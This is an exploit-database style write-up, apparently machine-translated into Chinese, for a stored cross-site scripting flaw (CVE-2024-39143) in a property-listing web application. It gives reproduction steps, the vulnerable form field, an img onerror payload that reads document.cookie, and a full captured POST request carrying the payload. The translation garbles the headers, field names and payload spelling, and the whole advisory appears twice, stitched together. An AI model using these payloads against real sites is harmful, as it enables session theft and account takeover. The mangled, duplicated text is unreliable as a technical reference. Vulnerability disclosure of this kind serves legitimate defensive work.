#利用标题:居住=2.10.1存储的跨站点脚本
通过内容表格
#日期: 8-7-2024
#类别: Web应用程序
#剥削作者:耶利米杰拉尔迪
#版本: 2.10.1
#在: Windows上测试
#CVE: CVE-2024-39143
Description:
-----------------------
存储的跨站点脚本(XSS)漏洞存在
居民2.10.1允许低特你的用户创建
内部带有HTML的恶意财产内容,它充当
存储的XSS有效载荷。如果任何人访问此属性页面
包括管理员,然后XSS有效载荷将被触发。
繁殖的步骤
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1。作为具有属性编辑功能的低特权用户登录。
2。创建或编辑用户拥有的属性之一
(我们可以用户用户用户拥有的默认属性)。
3。使用代码视图功能使用XSS有效载荷填写内容表格。
保存之前,请确保使用通常的视图返回以查看HTML是否
是否渲染。
脆弱的参数名称:属性[property_description] [content]
示例payload: img src='x'oneerror='alert(document.cookie)'
4。保存新属性内容并单击“完成编辑”后,
转到页面,查看XSS是触发的。
可以使用任何帐户甚至
未经授权的帐户。
Burp请求
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
发布/en/user/property/7/编辑http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:127.0)
壁虎/20100101 Firefox/127.0
ACCEPT:文本/HTML,应用程序/XHTML
XML,Application/XML; Q=0.9,Image/Avif,Image/WebP,/; Q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 1111
Origin: http://localhost
Connection:保持空白
Referer: http://localhost/en/user/property/7/编辑
cookie: rome ymeme=app.entity.user:dxnlcg ~~ :1722991344:S-spustttpmslqb2b2b2b2b2b2gjckatckatckhgtfj1vj1vj1vj1vj1vuva
phpsessID=FHP06BC4SC5I8P4FK5BT9PETII;侧边栏toggled=false
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
Priority: U=1
属性[City]=3property [district]=属性[邻域]=3property [Metro_Station]=属性[DealType]=1property [category]=1property [浴室_number]=属性[bedrooms_number]=2property=2property [max_guests]=6property=6property=6property [property___description [property__description]]
翻新的2卧室2浴室
flatproperty [property_description] [meta_title]=属性[property_description] [meta_description]=提供
翻新的2卧室2浴室Flatproperty [地址]=5411 Bayshore
大道,坦帕,佛罗里达州
33611 property [latitude]=27.885095property [经度]=-82.486153property [show_map]=1property [Price]=2200property [Price_type]=Mopoperty [feat [feat] ures] []=1property [features] []=2property [features] []=4property [features] [] []=6property [features] [features] []=8property [property_description] [content] [content]=img
src='x' oneerror='alert(document.domain)'files=property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg
通过内容表格
#日期: 8-7-2024
#类别: Web应用程序
#剥削作者:耶利米杰拉尔迪
#版本: 2.10.1
#在: Windows上测试
#CVE: CVE-2024-39143
Description:
-----------------------
存储的跨站点脚本(XSS)漏洞存在
居民2.10.1允许低特你的用户创建
内部带有HTML的恶意财产内容,它充当
存储的XSS有效载荷。如果任何人访问此属性页面
包括管理员,然后XSS有效载荷将被触发。
繁殖的步骤
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1。作为具有属性编辑功能的低特权用户登录。
2。创建或编辑用户拥有的属性之一
(我们可以用户用户用户拥有的默认属性)。
3。使用代码视图功能使用XSS有效载荷填写内容表格。
保存之前,请确保使用通常的视图返回以查看HTML是否
是否渲染。
脆弱的参数名称:属性[property_description] [content]
示例payload: img src='x'oneerror='alert(document.cookie)'
4。保存新属性内容并单击“完成编辑”后,
转到页面,查看XSS是触发的。
可以使用任何帐户甚至
未经授权的帐户。
Burp请求
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
发布/en/user/property/7/编辑http/1.1
HOST: LOCALHOST
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64; rv:127.0)
壁虎/20100101 Firefox/127.0
ACCEPT:文本/HTML,应用程序/XHTML
XML,Application/XML; Q=0.9,Image/Avif,Image/WebP,/; Q=0.8
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 1111
Origin: http://localhost
Connection:保持空白
Referer: http://localhost/en/user/property/7/编辑
cookie: rome ymeme=app.entity.user:dxnlcg ~~ :1722991344:S-spustttpmslqb2b2b2b2b2b2gjckatckatckhgtfj1vj1vj1vj1vj1vuva
phpsessID=FHP06BC4SC5I8P4FK5BT9PETII;侧边栏toggled=false
升级- 不肯定- requests: 1
sec-fetch-Dest:文档
sec-fetch mode:导航
sec-fetch-site:相同原产
sec-fetch-user:1
Priority: U=1
属性[City]=3property [district]=属性[邻域]=3property [Metro_Station]=属性[DealType]=1property [category]=1property [浴室_number]=属性[bedrooms_number]=2property=2property [max_guests]=6property=6property=6property [property___description [property__description]]
翻新的2卧室2浴室
flatproperty [property_description] [meta_title]=属性[property_description] [meta_description]=提供
翻新的2卧室2浴室Flatproperty [地址]=5411 Bayshore
大道,坦帕,佛罗里达州
33611 property [latitude]=27.885095property [经度]=-82.486153property [show_map]=1property [Price]=2200property [Price_type]=Mopoperty [feat [feat] ures] []=1property [features] []=2property [features] []=4property [features] [] []=6property [features] [features] []=8property [property_description] [content] [content]=img
src='x' oneerror='alert(document.domain)'files=property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg